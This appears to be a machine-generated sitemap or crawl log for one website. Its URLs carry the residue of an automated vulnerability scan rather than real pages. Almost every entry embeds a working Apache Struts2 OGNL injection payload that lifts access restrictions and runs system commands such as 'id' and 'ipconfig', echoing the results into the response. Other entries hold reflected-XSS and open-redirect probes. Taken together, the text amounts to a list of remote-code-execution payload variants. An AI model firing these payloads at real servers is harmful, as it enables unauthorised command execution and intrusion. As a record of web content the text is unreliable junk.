http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?method%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=k6mgo? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?$%7b100002-1%2b'anonymous_'%2b'security_s2015_test'%7d.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27_002_product.html%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/xsstest?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html??debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/fsm19276%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem71444?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?=%3c714b91%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?xsstest 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?=http%3a%2f%2fwww.site120.cn%2fwebscantest_alert.html 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27_002_product.html%3f=%3c78010a%3c? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?=http%3a%2f%2fwww.site120.cn%2fwebscantest_alert.html 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?=%3c49b61b%20x%3d918817483%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f=http%3a%2f%2fwww.site120.cn%2fwebscantest_alert.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?xsstest? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html%3f=%3c49b61b+x%3d918817483%3e? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/osm87234%e8%b0%b0o1%e5%85%b0o2a%e6%81%87coem55947?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/xsstest?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html%3f=http%3a%2f%2fwww.site120.cn%2fwebscantest_alert.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html%3f=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html%3f=osm87234%ef%bf%bd%ef%bf%bdo1%ef%bf%bd%ef%bf%bdo2a%ef%bf%bdbcoem55947? 0.5 2024-04-15 